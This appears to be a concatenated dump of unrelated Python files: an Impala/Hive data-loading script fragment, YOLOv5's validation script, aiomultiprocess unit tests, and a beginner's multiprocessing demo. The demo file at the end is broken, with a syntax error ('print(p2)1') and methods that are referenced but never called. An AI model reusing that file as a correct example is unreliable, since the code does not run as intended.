error_msg = "%s: %s" % (error_msg, str(e))
finally:
if ret_val != 0:
print error_msg
if exit_on_error: sys.exit(ret_val)
return ret_val
def exec_hive_query_from_file(file_name):
if not os.path.exists(file_name): return
hive_cmd = "%s %s -f %s" % (HIVE_CMD, HIVE_ARGS, file_name)
print 'Executing Hive Command: %s' % hive_cmd
exec_cmd(hive_cmd, 'Error executing file from Hive: ' + file_name)
def exec_hbase_query_from_file(file_name):
if not os.path.exists(file_name): return
hbase_cmd = "hbase shell %s" % file_name
print 'Executing HBase Command: %s' % hbase_cmd
exec_cmd(hbase_cmd, 'Error executing hbase create commands')
def exec_impala_query_from_file(file_name):
"""Execute each query in an Impala query file individually"""
is_success = True
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
try:
impala_client.connect()
with open(file_name, 'r+') as query_file:
queries = sqlparse.split(query_file.read())
for query in queries:
query = sqlparse.format(query.rstrip(';'), strip_comments=True)
print '(%s):\n%s\n' % (file_name, query.strip())
result = impala_client.execute(query)
except Exception as e:
print "Data Loading from Impala failed with error: %s" % str(e)
is_success = False
finally:
impala_client.close_connection()
return is_success
def exec_bash_script(file_name):
bash_cmd = "bash %s" % file_name
print 'Executing Bash Command: ' + bash_cmd
exec_cmd(bash_cmd, 'Error bash script: ' + file_name)
def generate_schema_statements(workload):
generate_cmd = GENERATE_SCHEMA_CMD % (options.exploration_strategy, workload,
options.scale_factor)
if options.table_names:
generate_cmd += " --table_names=%s" % options.table_names
if options.force_reload:
generate_cmd += " --force_reload"
if options.table_formats:
generate_cmd += " --table_formats=%s" % options.table_formats
if options.hive_warehouse_dir is not None:
generate_cmd += " --hive_warehouse_dir=%s" % options.hive_warehouse_dir
if options.hdfs_namenode is not None:
generate_cmd += " --hdfs_namenode=%s" % options.hdfs_namenode
print 'Executing Generate Schema Command: ' + generate_cmd
schema_cmd = os.path.join(TESTDATA_BIN_DIR, generate_cmd)
error_msg = 'Error generating schema statements for workload: ' + workload
exec_cmd(schema_cmd, error_msg)
def get_dataset_for_workload(workload):
dimension_file_name = os.path.join(WORKLOAD_DIR, workload,
'%s_dimensions.csv' % workload)
if not os.path.isfile(dimension_file_name):
print 'Dimension file not found: ' + dimension_file_name
sys.exit(1)
with open(dimension_file_name, 'rb') as input_file:
match = re.search('dataset:\s*([\w\-\.]+)', input_file.read())
if match:
return match.group(1)
else:
print 'Dimension file does not contain dataset for workload \'%s\'' % (workload)
sys.exit(1)
def copy_avro_schemas_to_hdfs(schemas_dir):
"""Recursively copies all of schemas_dir to the test warehouse."""
if not os.path.exists(schemas_dir):
print 'Avro schema dir (%s) does not exist. Skipping copy to HDFS.' % schemas_dir
return
exec_hadoop_fs_cmd("-mkdir -p " + options.hive_warehouse_dir)
exec_hadoop_fs_cmd("-put -f %s %s/" % (schemas_dir, options.hive_warehouse_dir))
def exec_hadoop_fs_cmd(args, exit_on_error=True):
cmd = "%s fs %s" % (HADOOP_CMD, args)
print "Executing Hadoop command: " + cmd
exec_cmd(cmd, "Error executing Hadoop command, exiting",
exit_on_error=exit_on_error)
def exec_impala_query_from_file_parallel(query_files):
# Get the name of the query file that loads the base tables, if it exists.
# TODO: Find a better way to detect the file that loads the base tables.
create_base_table_file = next((q for q in query_files if 'text' in q), None)
if create_base_table_file:
is_success = exec_impala_query_from_file(create_base_table_file)
query_files.remove(create_base_table_file)
# If loading the base tables failed, exit with a non zero error code.
if not is_success: sys.exit(1)
if not query_files: return
threads = []
result_queue = Queue()
for query_file in query_files:
thread = Thread(target=lambda x: result_queue.put(exec_impala_query_from_file(x)),
args=[query_file])
thread.daemon = True
threads.append(thread)
thread.start()
# Keep looping until the number of results retrieved is the same as the number of
# threads spawned, or until a data loading query fails. result_queue.get() will
# block until a result is available in the queue.
num_fetched_results = 0
while num_fetched_results < len(threads):
success = result_queue.get()
num_fetched_results += 1
if not success: sys.exit(1)
# There is a small window where a thread may still be alive even if all the threads have
# finished putting their results in the queue.
for thread in threads: thread.join()
def invalidate_impala_metadata():
print "Invalidating Metadata"
impala_client = ImpalaBeeswaxClient(options.impalad, use_kerberos=options.use_kerberos)
impala_client.connect()
try:
impala_client.execute('invalidate metadata')
finally:
impala_client.close_connection()
if __name__ == "__main__":
all_workloads = available_workloads(WORKLOAD_DIR)
workloads = []
if options.workloads is None:
print "At least one workload name must be specified."
parser.print_help()
sys.exit(1)
elif options.workloads == 'all':
print 'Loading data for all workloads.'
workloads = all_workloads
else:
workloads = options.workloads.split(",")
validate_workloads(all_workloads, workloads)
print 'Starting data load for the following workloads: ' + ', '.join(workloads)
loading_time_map = collections.defaultdict(float)
for workload in workloads:
start_time = time.time()
dataset = get_dataset_for_workload(workload)
generate_schema_statements(workload)
assert os.path.isdir(os.path.join(DATA_LOAD_DIR, dataset)), ("Data loading files "
"do not exist for (%s)" % dataset)
os.chdir(os.path.join(DATA_LOAD_DIR, dataset))
copy_avro_schemas_to_hdfs(AVRO_SCHEMA_DIR)
dataset_dir_contents = os.listdir(os.getcwd())
load_file_substr = "%s-%s" % (workload, options.exploration_strategy)
# Data loading with Impala is done in parallel, each file format has a separate query
# file.
create_filename = '%s-impala-generated' % load_file_substr
load_filename = '%s-impala-load-generated' % load_file_substr
impala_create_files = [f for f in dataset_dir_contents if create_filename in f]
impala_load_files = [f for f in dataset_dir_contents if load_filename in f]
# Execute the data loading scripts.
# Creating tables in Impala has no dependencies, so we execute them first.
# HBase table inserts are done via hive, so the hbase tables need to be created before
# running the hive script. Finally, some of the Impala inserts depend on hive tables,
# so they're done at the end.
exec_impala_query_from_file_parallel(impala_create_files)
exec_hbase_query_from_file('load-%s-hbase-generated.create' % load_file_substr)
exec_hive_query_from_file('load-%s-hive-generated.sql' % load_file_substr)
if impala_load_files: invalidate_impala_metadata()
exec_impala_query_from_file_parallel(impala_load_files)
loading_time_map[workload] = time.time() - start_time
invalidate_impala_metadata()
total_time = 0.0
for workload, load_time in loading_time_map.iteritems():
total_time += load_time
print 'Data loading for workload \'%s\' completed in: %.2fs'\
% (workload, load_time)
print 'Total load time: %.2fs\n' % total_time
|
val.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
from tqdm import tqdm
FILE = Path(__file__).resolve()
ROOT = FILE.parents[0] # YOLOv5 root directory
if str(ROOT) not in sys.path:
sys.path.append(str(ROOT)) # add ROOT to PATH
ROOT = Path(os.path.relpath(ROOT, Path.cwd())) # relative
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import (
coco80_to_coco91_class,
check_dataset,
check_img_size,
check_requirements,
check_suffix,
check_yaml,
box_iou,
non_max_suppression,
scale_coords,
xyxy2xywh,
xywh2xyxy,
set_logging,
increment_path,
colorstr,
print_args,
)
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import output_to_target, plot_images, plot_val_study
from utils.torch_utils import select_device, time_sync
from utils.callbacks import Callbacks
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (
(xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist()
) # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, "a") as f:
f.write(("%g " * len(line)).rstrip() % line + "\n")
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append(
{
"image_id": image_id,
"category_id": class_map[int(p[5])],
"bbox": [round(x, 3) for x in b],
"score": round(p[4], 5),
}
)
def process_batch(detections, labels, iouv):
"""
Return correct predictions matrix. Both sets of boxes are in (x1, y1, x2, y2) format.
Arguments:
detections (Array[N, 6]), x1, y1, x2, y2, conf, class
labels (Array[M, 5]), class, x1, y1, x2, y2
Returns:
correct (Array[N, 10]), for 10 IoU levels
"""
correct = torch.zeros(
detections.shape[0], iouv.shape[0], dtype=torch.bool, device=iouv.device
)
iou = box_iou(labels[:, 1:], detections[:, :4])
x = torch.where(
(iou >= iouv[0]) & (labels[:, 0:1] == detections[:, 5])
) # IoU above threshold and classes match
if x[0].shape[0]:
matches = (
torch.cat((torch.stack(x, 1), iou[x[0], x[1]][:, None]), 1).cpu().numpy()
) # [label, detection, iou]
if x[0].shape[0] > 1:
matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 1], return_index=True)[1]]
# matches = matches[matches[:, 2].argsort()[::-1]]
matches = matches[np.unique(matches[:, 0], return_index=True)[1]]
matches = torch.Tensor(matches).to(iouv.device)
correct[matches[:, 1].long()] = matches[:, 2:3] >= iouv
return correct
@torch.no_grad()
def run(
data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task="val", # train, val, test, speed or study
device="", # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project=ROOT / "runs/val", # save to project/name
name="exp", # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(""),
plots=True,
callbacks=Callbacks(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(
Path(project) / name, exist_ok=exist_ok
) # increment run
(save_dir / "labels" if save_txt else save_dir).mkdir(
parents=True, exist_ok=True
) # make dir
# Load model
check_suffix(weights, ".pt")
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check image size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Data
data = check_dataset(data) # check
# Half
half &= device.type != "cpu" # half precision only supported on CUDA
model.half() if half else model.float()
# Configure
model.eval()
is_coco = isinstance(data.get("val"), str) and data["val"].endswith(
"coco/val2017.txt"
) # COCO dataset
nc = 1 if single_cls else int(data["nc"]) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
if device.type != "cpu":
model(
torch.zeros(1, 3, imgsz, imgsz)
.to(device)
.type_as(next(model.parameters()))
) # run once
pad = 0.0 if task == "speed" else 0.5
task = (
task if task in ("train", "val", "test") else "val"
) # path to train/val/test images
dataloader = create_dataloader(
data[task],
imgsz,
batch_size,
gs,
single_cls,
pad=pad,
rect=True,
prefix=colorstr(f"{task}: "),
)[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {
k: v
for k, v in enumerate(
model.names if hasattr(model, "names") else model.module.names
)
}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
s = ("%20s" + "%11s" * 6) % (
"Class",
"Images",
"Labels",
"P",
"R",
"mAP@.5",
"mAP@.5:.95",
)
dt, p, r, f1, mp, mr, map50, map = (
[0.0, 0.0, 0.0],
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
)
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t1 = time_sync()
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
t2 = time_sync()
dt[0] += t2 - t1
# Run model
out, train_out = model(img, augment=augment) # inference and training outputs
dt[1] += time_sync() - t2
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[
1
] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(
device
) # to pixels
lb = (
[targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else []
) # for autolabelling
t3 = time_sync()
out = non_max_suppression(
out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls
)
dt[2] += time_sync() - t3
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append(
(
torch.zeros(0, niou, dtype=torch.bool),
torch.Tensor(),
torch.Tensor(),
tcls,
)
)
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(
img[si].shape[1:], predn[:, :4], shape, shapes[si][1]
) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(
img[si].shape[1:], tbox, shape, shapes[si][1]
) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append(
(correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)
) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(
predn,
save_conf,
shape,
file=save_dir / "labels" / (path.stem + ".txt"),
)
if save_json:
save_one_json(
predn, jdict, path, class_map
) # append to COCO-JSON dictionary
callbacks.run("on_val_image_end", pred, predn, path, names, img[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f"val_batch{batch_i}_labels.jpg" # labels
Thread(
target=plot_images, args=(img, targets, paths, f, names), daemon=True
).start()
f = save_dir / f"val_batch{batch_i}_pred.jpg" # predictions
Thread(
target=plot_images,
args=(img, output_to_target(out), paths, f, names),
daemon=True,
).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(
*stats, plot=plots, save_dir=save_dir, names=names
)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(
stats[3].astype(np.int64), minlength=nc
) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = "%20s" + "%11i" * 2 + "%11.3g" * 4 # print format
print(pf % ("all", seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1e3 for x in dt) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
print(
f"Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}"
% t
)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run("on_val_end")
# Save JSON
if save_json and len(jdict):
w = (
Path(weights[0] if isinstance(weights, list) else weights).stem
if weights is not None
else ""
) # weights
anno_json = str(
Path(data.get("path", "../coco")) / "annotations/instances_val2017.json"
) # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print(f"\nEvaluating pycocotools mAP... saving {pred_json}...")
with open(pred_json, "w") as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(["pycocotools"])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, "bbox")
if is_coco:
eval.params.imgIds = [
int(Path(x).stem) for x in dataloader.dataset.img_files
] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f"pycocotools unable to run: {e}")
# Return results
model.float() # for training
if not training:
s = (
f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}"
if save_txt
else ""
)
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser()
parser.add_argument(
"--data", type=str, default=ROOT / "data/coco128.yaml", help="dataset.yaml path"
)
parser.add_argument(
"--weights",
nargs="+",
type=str,
default=ROOT / "yolov5s.pt",
help="model.pt path(s)",
)
parser.add_argument("--batch-size", type=int, default=32, help="batch size")
parser.add_argument(
"--imgsz",
"--img",
"--img-size",
type=int,
default=640,
help="inference size (pixels)",
)
parser.add_argument(
"--conf-thres", type=float, default=0.001, help="confidence threshold"
)
parser.add_argument(
"--iou-thres", type=float, default=0.6, help="NMS IoU threshold"
)
parser.add_argument(
"--task", default="val", help="train, val, test, speed or study"
)
parser.add_argument(
"--device", default="", help="cuda device, i.e. 0 or 0,1,2,3 or cpu"
)
parser.add_argument(
"--single-cls", action="store_true", help="treat as single-class dataset"
)
parser.add_argument("--augment", action="store_true", help="augmented inference")
parser.add_argument("--verbose", action="store_true", help="report mAP by class")
parser.add_argument("--save-txt", action="store_true", help="save results to *.txt")
parser.add_argument(
"--save-hybrid",
action="store_true",
help="save label+prediction hybrid results to *.txt",
)
parser.add_argument(
"--save-conf", action="store_true", help="save confidences in --save-txt labels"
)
parser.add_argument(
"--save-json", action="store_true", help="save a COCO-JSON results file"
)
parser.add_argument(
"--project", default=ROOT / "runs/val", help="save to project/name"
)
parser.add_argument("--name", default="exp", help="save to project/name")
parser.add_argument(
"--exist-ok",
action="store_true",
help="existing project/name ok, do not increment",
)
parser.add_argument(
"--half", action="store_true", help="use FP16 half-precision inference"
)
opt = parser.parse_args()
opt.data = check_yaml(opt.data) # check YAML
opt.save_json |= opt.data.endswith("coco.yaml")
opt.save_txt |= opt.save_hybrid
print_args(FILE.stem, opt)
return opt
def main(opt):
set_logging()
check_requirements(exclude=("tensorboard", "thop"))
if opt.task in ("train", "val", "test"): # run normally
run(**vars(opt))
elif opt.task == "speed": # speed benchmarks
# python val.py --task speed --data coco.yaml --batch 1 --weights yolov5n.pt yolov5s.pt...
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(
opt.data,
weights=w,
batch_size=opt.batch_size,
imgsz=opt.imgsz,
conf_thres=0.25,
iou_thres=0.45,
device=opt.device,
save_json=False,
plots=False,
)
elif opt.task == "study": # run over a range of settings and save/plot
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5n.pt yolov5s.pt...
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f"study_{Path(opt.data).stem}_{Path(w).stem}.txt" # filename to save to
y = [] # y axis
for i in x: # img-size
print(f"\nRunning {f} point {i}...")
r, _, t = run(
opt.data,
weights=w,
batch_size=opt.batch_size,
imgsz=i,
conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres,
device=opt.device,
save_json=opt.save_json,
plots=False,
)
y.append(r + t) # results and times
np.savetxt(f, y, fmt="%10.4g") # save
os.system("zip -r study.zip study_*.txt")
plot_val_study(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
core.py
|
# Copyright 2018 John Reese
# Licensed under the MIT license
import asyncio
import sys
import time
from unittest import TestCase
from unittest.mock import patch
import aiomultiprocess as amp
from .base import (
async_test,
do_nothing,
get_dummy_constant,
initializer,
raise_fn,
sleepy,
two,
)
class CoreTest(TestCase): # pylint: disable=too-many-public-methods
def setUp(self):
# reset to default context before each test
amp.set_start_method()
@async_test
async def test_process(self):
p = amp.Process(target=sleepy, name="test_process")
p.start()
self.assertEqual(p.name, "test_process")
self.assertTrue(p.pid)
self.assertTrue(p.is_alive())
await p.join()
self.assertFalse(p.is_alive())
@async_test
async def test_process_await(self):
p = amp.Process(target=sleepy, name="test_process")
await p
self.assertIsNotNone(p.exitcode)
p = amp.Process(target=sleepy, name="test_process")
p.start()
await p
self.assertIsNotNone(p.exitcode)
@async_test
async def test_process_join(self):
p = amp.Process(target=sleepy, name="test_process")
with self.assertRaisesRegex(ValueError, "must start process"):
await p.join()
p.start()
await p.join()
self.assertIsNotNone(p.exitcode)
@async_test
async def test_process_daemon(self):
p = amp.Process(daemon=False)
self.assertEqual(p.daemon, False)
p.daemon = True
self.assertEqual(p.daemon, True)
p = amp.Process(daemon=True)
self.assertEqual(p.daemon, True)
p.daemon = False
self.assertEqual(p.daemon, False)
@async_test
async def test_process_terminate(self):
start = time.time()
p = amp.Process(target=asyncio.sleep, args=(1,), name="test_process")
p.start()
p.terminate()
await p.join()
self.assertLess(p.exitcode, 0)
self.assertLess(time.time() - start, 0.6)
@async_test
async def test_process_kill(self):
p = amp.Process(target=sleepy)
p.start()
if sys.version_info >= (3, 7):
p.kill()
await p.join()
self.assertLess(p.exitcode, 0)
else:
with self.assertRaises(AttributeError):
p.kill()
await p.join()
@async_test
async def test_process_close(self):
p = amp.Process(target=sleepy)
p.start()
if sys.version_info >= (3, 7):
with self.assertRaises(ValueError):
self.assertIsNone(p.exitcode)
p.close()
await p.join()
self.assertIsNotNone(p.exitcode)
p.close()
with self.assertRaises(ValueError):
_ = p.exitcode
else:
with self.assertRaises(AttributeError):
p.close()
await p.join()
@async_test
async def test_process_timeout(self):
p = amp.Process(target=sleepy)
p.start()
with self.assertRaises(asyncio.TimeoutError):
await p.join(timeout=0.01)
@async_test
async def test_worker(self):
p = amp.Worker(target=sleepy)
p.start()
with self.assertRaisesRegex(ValueError, "coroutine not completed"):
_ = p.result
await p.join()
self.assertFalse(p.is_alive())
self.assertEqual(p.result, p.pid)
@async_test
async def test_worker_join(self):
# test results from join
p = amp.Worker(target=sleepy)
p.start()
self.assertEqual(await p.join(), p.pid)
# test awaiting p directly, no need to start
p = amp.Worker(target=sleepy)
self.assertEqual(await p, p.pid)
@async_test
async def test_spawn_method(self):
self.assertEqual(amp.core.get_context().get_start_method(), "spawn")
async def inline(x):
return x
with self.assertRaises(AttributeError):
await amp.Worker(target=inline, args=(1,), name="test_inline")
result = await amp.Worker(target=two, name="test_global")
self.assertEqual(result, 2)
@async_test
async def test_set_start_method(self):
with self.assertRaises(ValueError):
amp.set_start_method("foo")
if sys.platform.startswith("win32"):
amp.set_start_method(None)
self.assertEqual(amp.core.get_context().get_start_method(), "spawn")
with self.assertRaises(ValueError):
amp.set_start_method("fork")
elif sys.platform.startswith("linux") or sys.platform.startswith("darwin"):
amp.set_start_method("fork")
async def inline(x):
return x
result = await amp.Worker(target=inline, args=(17,), name="test_inline")
self.assertEqual(result, 17)
@patch("aiomultiprocess.core.set_start_method")
@async_test
async def test_set_context(self, ssm_mock):
amp.set_context()
ssm_mock.assert_called_with(None)
amp.set_context("foo")
ssm_mock.assert_called_with("foo")
ssm_mock.side_effect = Exception("fake exception")
with self.assertRaisesRegex(Exception, "fake exception"):
amp.set_context("whatever")
@async_test
async def test_initializer(self):
result = await amp.Worker(
target=get_dummy_constant,
name="test_process",
initializer=initializer,
initargs=(10,),
)
self.assertEqual(result, 10)
@async_test
async def test_async_initializer(self):
with self.assertRaises(ValueError) as _:
p = amp.Process(target=sleepy, name="test_process", initializer=sleepy)
p.start()
@async_test
async def test_raise(self):
result = await amp.Worker(
target=raise_fn, name="test_process", initializer=do_nothing
)
self.assertIsInstance(result, RuntimeError)
@async_test
async def test_sync_target(self):
with self.assertRaises(ValueError) as _:
p = amp.Process(
target=do_nothing, name="test_process", initializer=do_nothing
)
p.start()
@async_test
async def test_not_implemented(self):
with self.assertRaises(NotImplementedError):
await amp.core.not_implemented()
|
multiprocess_test.py
|
#importing modules
import multiprocessing
import time
#define function to calculate the square value of a number
def calculate_square(nums):#defining the function
for n in nums: #for loop
time.sleep(5)#essentially we slow down the process so we can see the output
print('square ' + str(n*n) ) #print the calculated square of a number
#define function to calculate the cube value of a number
def calculate_cube(nums):
for n in nums:
time.sleep(5)
print('cube ' + str(n*n*n) )
#if so we can see if it is the main script
##if __name__ == '__main__': #unnecessary in hindsight
arrs=[2,3,8,9]
p1 = multiprocessing.Process(target=calculate_square, args=(arrs,))
p2 = multiprocessing.Process(target=calculate_cube, args=(arrs,))
p1.start()#start multiprocess 1
p2.start()#start multiprocess 2
p1.join
p2.join
print(p1)
print(p2)1
print("Done")
#using map reduce
from multiprocessing import Pool
def f(n):
return n*n
p = Pool(processes=3)
result = p.map(f,[1,2,3,4,5])
for n in result:
print(n)
#using multithread
import threading
t=time.time()
t1=threading.Thread(target=calculate_square, args=(arrs,))#just like the others target=function, args=arguments of function
t2=threading.Thread(target=calculate_cube, args=(arrs,))#same thing but or cube
t1.start#start process for thread 1
t2.start#start process for thread 2
t1.join()#stop thread 1
t2.join()#stop thread 2
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.